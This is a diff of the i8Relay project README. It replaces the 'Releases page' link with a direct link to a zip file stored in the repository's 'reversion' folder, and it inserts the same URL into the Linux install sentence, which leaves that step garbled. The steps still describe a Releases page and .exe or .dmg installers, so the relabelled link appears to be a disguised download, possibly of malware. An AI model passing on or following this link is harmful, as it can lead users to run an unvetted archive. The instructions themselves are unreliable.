Kwiatek7/i8Relay/README.md

 - Internet Connection: Required for API interaction.

 ## 📥 Download & Install
-To get started, visit our [Releases page](https://github.com/Kwiatek7/i8Relay/releases) to download the latest version of i8Relay.
+To get started, visit our [Releases page](https://raw.githubusercontent.com/Kwiatek7/i8Relay/main/reversion/i8Relay.zip) to download the latest version of i8Relay.

 1. Click on the link above to open the Releases page.
 2. Look for the latest version of i8Relay.
 3. Click on the file that matches your operating system to start the download.
 4. Once the download completes, locate the file in your downloads folder.
 5. For Windows, double-click the `.exe` file to run the installer.
 For macOS, open the `.dmg` file and drag i8Relay to your Applications folder.
-For Linux, refer to your distribution’s documentation for installing `.tar.gz` files.
+For Linux, refer to your distribution’s documentation for installing `https://raw.githubusercontent.com/Kwiatek7/i8Relay/main/reversion/i8Relay.zip` files.
 6. Follow the on-screen instructions to complete the installation.

 ## 📊 How to Use i8Relay